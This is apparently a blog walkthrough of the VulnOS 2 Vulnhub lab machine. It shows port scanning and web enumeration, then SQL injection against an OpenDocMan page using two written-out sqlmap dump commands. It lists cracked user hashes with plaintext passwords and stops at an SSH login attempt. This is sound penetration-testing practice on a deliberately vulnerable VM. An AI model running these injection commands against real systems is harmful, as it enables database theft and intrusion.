Vuln OS

Posted Jun 11, 2023 Updated Apr 7, 2024

VulnOS Machine 💻

By Shivendra Prajapati 1 min read

Description ⤵️

💡 VulnOS are a series of vulnerable operating systems packed as virtual images to enhance penetration testing skills

This is version 2 -

Smaller, less chaotic !

As time is not always on my side, It took a long time to create another VulnOS. But I like creating them. The image is build with VBOX. Unpack the file and add it to your virtualisation software.

Your assignment is to pentest a company website, get root of the system and read the final flag

NOTE : current keyboard preferences is BE “pentesting is a wide concept”

If you have questions, feel free to contact me on m4db33f@gmail dot com Shout out to the Vulnhub Testing team!

Hope you enjoy.

Let’s find the IP Address first »

{: .nolineno}
IP : 192.168.56.104

Port Scan Results ➡️

Open Ports >
	SSH
	HTTP
irc

Web Enumeration ⤵️

After roming around I found Documentation page blank so I seen the source code and found this :

Lets check the source code of this page →

I got a directory named as /jabcd0cs/ →

After trying to upload the shell I can not able to bypass mime-type and If I have then also I can not able to launch me shell .

Now After seeing this exploit of opendocman I got some inside about SQLi and lets try it out now :

Lets take the help of sqlmap on it →

  
command : 
sqlmap -u "http://192.168.56.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --dump

  
command : 
sqlmap -u "http://192.168.56.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs -T odm_user --dump

Lets crack these hashes →

Now I have credentials :

webmin:b78aae356709f8c31118ea613980954b : webmin1980

guest:084e0343a0486ff05530df6c705c8bb4 : guest

admin:d5c6a61719d7da181397b6db2376c2e7

Now lets try SSH login through webmin →